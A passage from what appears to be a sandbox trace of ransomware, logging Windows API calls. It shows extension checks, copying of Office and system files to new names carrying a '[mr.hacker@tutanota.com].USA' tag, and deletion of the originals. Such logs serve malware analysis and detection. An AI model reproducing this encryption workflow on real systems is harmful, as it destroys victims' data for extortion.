Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0053.840] lstrlenW (lpString=".jpg") returned 4 [0053.840] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0053.841] lstrcmpiW (lpString1=".sys", lpString2=".USA") returned -1 [0053.841] lstrlenW (lpString="pagefile.sys") returned 12 [0053.841] CreateFileW (lpFileName="C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0053.841] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0053.841] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0053.841] lstrlenW (lpString=".doc") returned 4 [0053.841] lstrcmpiW (lpString1=".doc", lpString2=".sys") returned -1 [0053.841] lstrlenW (lpString=".docx") returned 5 [0053.841] lstrcmpiW (lpString1=".docx", lpString2="e.sys") returned -1 [0053.841] lstrlenW (lpString=".pdf") returned 4 [0053.841] lstrcmpiW (lpString1=".pdf", lpString2=".sys") returned -1 [0053.841] lstrlenW (lpString=".xls") returned 4 [0053.841] lstrcmpiW (lpString1=".xls", lpString2=".sys") returned 1 [0053.841] lstrlenW (lpString=".xlsx") returned 5 [0053.841] lstrcmpiW (lpString1=".xlsx", lpString2="e.sys") returned -1 [0053.841] lstrlenW (lpString=".ppt") returned 4 [0053.841] lstrcmpiW (lpString1=".ppt", lpString2=".sys") returned -1 [0053.841] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0053.841] lstrlenW (lpString=".zip") returned 4 [0053.841] lstrcmpiW (lpString1=".zip", lpString2=".sys") returned 1 [0053.841] lstrlenW (lpString=".rar") returned 4 [0053.841] lstrcmpiW (lpString1=".rar", lpString2=".sys") returned -1 [0053.841] lstrlenW (lpString=".bz2") returned 4 [0053.841] lstrcmpiW (lpString1=".bz2", lpString2=".sys") returned -1 [0053.841] lstrlenW (lpString=".7z") returned 3 [0053.841] lstrcmpiW (lpString1=".7z", lpString2="sys") returned -1 [0053.841] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0053.841] lstrlenW (lpString=".dbf") returned 4 [0053.842] lstrcmpiW (lpString1=".dbf", lpString2=".sys") returned -1 [0053.842] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0053.842] lstrlenW (lpString=".1cd") returned 4 [0053.842] lstrcmpiW (lpString1=".1cd", lpString2=".sys") returned -1 [0053.842] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0053.842] lstrlenW (lpString=".jpg") returned 4 [0053.842] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0053.842] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0053.842] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0053.842] lstrlenW (lpString=".doc") returned 4 [0053.842] lstrcmpiW (lpString1=".doc", lpString2=".sys") returned -1 [0053.842] lstrlenW (lpString=".docx") returned 5 [0053.842] lstrcmpiW (lpString1=".docx", lpString2="e.sys") returned -1 [0053.842] lstrlenW (lpString=".pdf") returned 4 [0053.842] lstrcmpiW (lpString1=".pdf", lpString2=".sys") returned -1 [0053.842] lstrlenW (lpString=".xls") returned 4 [0053.842] lstrcmpiW (lpString1=".xls", lpString2=".sys") returned 1 [0053.842] lstrlenW (lpString=".xlsx") returned 5 [0053.842] lstrcmpiW (lpString1=".xlsx", lpString2="e.sys") returned -1 [0053.842] lstrlenW (lpString=".ppt") returned 4 [0053.842] lstrcmpiW (lpString1=".ppt", lpString2=".sys") returned -1 [0053.842] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0053.842] lstrlenW (lpString=".zip") returned 4 [0053.842] lstrcmpiW (lpString1=".zip", lpString2=".sys") returned 1 [0053.842] lstrlenW (lpString=".rar") returned 4 [0053.842] lstrcmpiW (lpString1=".rar", lpString2=".sys") returned -1 [0053.842] lstrlenW (lpString=".bz2") returned 4 [0053.842] lstrcmpiW (lpString1=".bz2", lpString2=".sys") returned -1 [0053.842] lstrlenW (lpString=".7z") returned 3 [0053.842] lstrcmpiW (lpString1=".7z", lpString2="sys") returned -1 [0053.842] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0053.842] lstrlenW (lpString=".dbf") returned 4 [0053.843] lstrcmpiW (lpString1=".dbf", lpString2=".sys") returned -1 [0053.843] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0053.843] lstrlenW (lpString=".1cd") returned 4 [0053.843] lstrcmpiW (lpString1=".1cd", lpString2=".sys") returned -1 [0053.843] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0053.843] lstrlenW (lpString=".jpg") returned 4 [0053.843] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0053.843] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0053.843] lstrlenW (lpString="MSADDNDR.DLL") returned 12 [0053.843] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0053.940] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x375ff1c | out: lpFileSize=0x375ff1c*=99136) returned 1 [0053.940] CloseHandle (hObject=0x1b8) returned 1 [0053.940] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll")) returned 0x20 [0053.940] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0053.940] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0053.940] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.941] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.941] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0053.941] GetLastError () returned 0x0 [0053.941] ReadFile (in: hFile=0x1b8, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0x18340, lpOverlapped=0x0) returned 1 [0053.945] WriteFile (in: hFile=0x224, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0x18350, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0x18350, lpOverlapped=0x0) returned 1 [0053.949] ReadFile (in: hFile=0x1b8, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.949] WriteFile (in: hFile=0x224, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.949] SetEndOfFile (hFile=0x224) returned 1 [0053.949] CloseHandle (hObject=0x224) returned 1 [0053.949] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.949] SetEndOfFile (hFile=0x1b8) returned 1 [0053.951] CloseHandle (hObject=0x1b8) returned 1 [0053.951] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.951] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll")) returned 1 [0053.951] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0053.951] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0053.951] lstrlenW (lpString=".doc") returned 4 [0053.951] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0053.951] lstrlenW (lpString=".docx") returned 5 [0053.951] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0053.951] lstrlenW (lpString=".pdf") returned 4 [0053.951] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0053.951] lstrlenW (lpString=".xls") returned 4 [0053.951] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0053.951] lstrlenW (lpString=".xlsx") returned 5 [0053.951] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0053.951] lstrlenW (lpString=".ppt") returned 4 [0053.951] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0053.951] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0053.951] lstrlenW (lpString=".zip") returned 4 [0053.951] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0053.952] lstrlenW (lpString=".rar") returned 4 [0053.952] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0053.952] lstrlenW (lpString=".bz2") returned 4 [0053.952] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0053.952] lstrlenW (lpString=".7z") returned 3 [0053.952] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.952] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0053.952] lstrlenW (lpString=".dbf") returned 4 [0053.952] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0053.952] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0053.952] lstrlenW (lpString=".1cd") returned 4 [0053.952] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0053.952] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0053.952] lstrlenW (lpString=".jpg") returned 4 [0053.952] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0053.952] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0053.952] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0053.952] lstrlenW (lpString=".doc") returned 4 [0053.952] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0053.952] lstrlenW (lpString=".docx") returned 5 [0053.952] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0053.952] lstrlenW (lpString=".pdf") returned 4 [0053.952] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0053.952] lstrlenW (lpString=".xls") returned 4 [0053.952] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0053.952] lstrlenW (lpString=".xlsx") returned 5 [0053.952] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0053.952] lstrlenW (lpString=".ppt") returned 4 [0053.952] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0053.952] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0053.952] lstrlenW (lpString=".zip") returned 4 [0053.952] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0053.952] lstrlenW (lpString=".rar") returned 4 [0053.953] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0053.953] lstrlenW (lpString=".bz2") returned 4 [0053.953] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0053.953] lstrlenW (lpString=".7z") returned 3 [0053.953] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.953] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0053.953] lstrlenW (lpString=".dbf") returned 4 [0053.953] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0053.953] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0053.953] lstrlenW (lpString=".1cd") returned 4 [0053.953] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0053.953] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0053.953] lstrlenW (lpString=".jpg") returned 4 [0053.953] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0053.962] lstrcmpiW (lpString1=".EXE", lpString2=".USA") returned -1 [0053.963] lstrlenW (lpString="DW20.EXE") returned 8 [0053.963] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x238 [0054.475] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x375ff1c | out: lpFileSize=0x375ff1c*=994184) returned 1 [0054.475] CloseHandle (hObject=0x238) returned 1 [0054.475] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe")) returned 0x20 [0054.475] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0054.475] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x238 [0054.475] SetFilePointerEx (in: hFile=0x238, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.475] SetFilePointerEx (in: hFile=0x238, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.475] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23c [0054.476] GetLastError () returned 0x0 [0054.476] ReadFile (in: hFile=0x238, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0xf2b88, lpOverlapped=0x0) returned 1 [0054.494] WriteFile (in: hFile=0x23c, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xf2b90, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0xf2b90, lpOverlapped=0x0) returned 1 [0054.510] ReadFile (in: hFile=0x238, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.510] WriteFile (in: hFile=0x23c, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0xe4, lpOverlapped=0x0) returned 1 [0054.510] SetEndOfFile (hFile=0x23c) returned 1 [0054.511] CloseHandle (hObject=0x23c) returned 1 [0054.511] SetFilePointerEx (in: hFile=0x238, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.511] SetEndOfFile (hFile=0x238) returned 1 [0054.518] CloseHandle (hObject=0x238) returned 1 [0054.518] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.519] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe")) returned 1 [0054.519] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0054.519] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0054.519] lstrlenW (lpString=".doc") returned 4 [0054.519] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0054.519] lstrlenW (lpString=".docx") returned 5 [0054.519] lstrcmpiW (lpString1=".docx", lpString2="0.EXE") returned -1 [0054.519] lstrlenW (lpString=".pdf") returned 4 [0054.519] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0054.519] lstrlenW (lpString=".xls") returned 4 [0054.519] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0054.519] lstrlenW (lpString=".xlsx") returned 5 [0054.519] lstrcmpiW (lpString1=".xlsx", lpString2="0.EXE") returned -1 [0054.519] lstrlenW (lpString=".ppt") returned 4 [0054.519] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0054.519] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0054.519] lstrlenW (lpString=".zip") returned 4 [0054.519] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0054.519] lstrlenW (lpString=".rar") returned 4 [0054.519] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0054.519] lstrlenW (lpString=".bz2") returned 4 [0054.519] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0054.519] lstrlenW (lpString=".7z") returned 3 [0054.519] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0054.519] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0054.520] lstrlenW (lpString=".dbf") returned 4 [0054.520] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0054.520] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0054.520] lstrlenW (lpString=".1cd") returned 4 [0054.520] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0054.520] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0054.520] lstrlenW (lpString=".jpg") returned 4 [0054.520] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0054.520] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0054.520] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0054.520] lstrlenW (lpString=".doc") returned 4 [0054.520] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0054.520] lstrlenW (lpString=".docx") returned 5 [0054.520] lstrcmpiW (lpString1=".docx", lpString2="0.EXE") returned -1 [0054.520] lstrlenW (lpString=".pdf") returned 4 [0054.520] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0054.520] lstrlenW (lpString=".xls") returned 4 [0054.520] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0054.520] lstrlenW (lpString=".xlsx") returned 5 [0054.520] lstrcmpiW (lpString1=".xlsx", lpString2="0.EXE") returned -1 [0054.520] lstrlenW (lpString=".ppt") returned 4 [0054.520] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0054.520] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0054.520] lstrlenW (lpString=".zip") returned 4 [0054.520] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0054.520] lstrlenW (lpString=".rar") returned 4 [0054.520] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0054.520] lstrlenW (lpString=".bz2") returned 4 [0054.520] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0054.520] lstrlenW (lpString=".7z") returned 3 [0054.520] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0054.521] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0054.521] lstrlenW (lpString=".dbf") returned 4 [0054.521] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0054.521] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0054.521] lstrlenW (lpString=".1cd") returned 4 [0054.521] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0054.521] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0054.521] lstrlenW (lpString=".jpg") returned 4 [0054.521] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0054.718] lstrcmpiW (lpString1=".CFG", lpString2=".USA") returned -1 [0054.718] lstrlenW (lpString="CGMIMP32.CFG") returned 12 [0054.718] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0054.718] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x375ff1c | out: lpFileSize=0x375ff1c*=6811) returned 1 [0054.718] CloseHandle (hObject=0x218) returned 1 [0054.718] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg")) returned 0x20 [0054.719] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0054.719] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0054.719] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.719] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.719] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0054.719] GetLastError () returned 0x0 [0054.719] ReadFile (in: hFile=0x218, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0x1a9b, lpOverlapped=0x0) returned 1 [0054.721] WriteFile (in: hFile=0x174, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0x1aa0, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0x1aa0, lpOverlapped=0x0) returned 1 [0054.722] ReadFile (in: hFile=0x218, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.722] WriteFile (in: hFile=0x174, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.722] SetEndOfFile (hFile=0x174) returned 1 [0054.722] CloseHandle (hObject=0x174) returned 1 [0054.722] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.722] SetEndOfFile (hFile=0x218) returned 1 [0054.723] CloseHandle (hObject=0x218) returned 1 [0054.723] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.723] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg")) returned 1 [0054.723] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0054.723] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0054.723] lstrlenW (lpString=".doc") returned 4 [0054.723] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1 [0054.723] lstrlenW (lpString=".docx") returned 5 [0054.723] lstrcmpiW (lpString1=".docx", lpString2="2.CFG") returned -1 [0054.723] lstrlenW (lpString=".pdf") returned 4 [0054.723] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1 [0054.723] lstrlenW (lpString=".xls") returned 4 [0054.723] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1 [0054.724] lstrlenW (lpString=".xlsx") returned 5 [0054.724] lstrcmpiW (lpString1=".xlsx", lpString2="2.CFG") returned -1 [0054.724] lstrlenW (lpString=".ppt") returned 4 [0054.724] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1 [0054.724] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0054.724] lstrlenW (lpString=".zip") returned 4 [0054.724] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1 [0054.724] lstrlenW (lpString=".rar") returned 4 [0054.724] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1 [0054.724] lstrlenW (lpString=".bz2") returned 4 [0054.724] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1 [0054.724] lstrlenW (lpString=".7z") returned 3 [0054.724] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1 [0054.724] lstrlenW 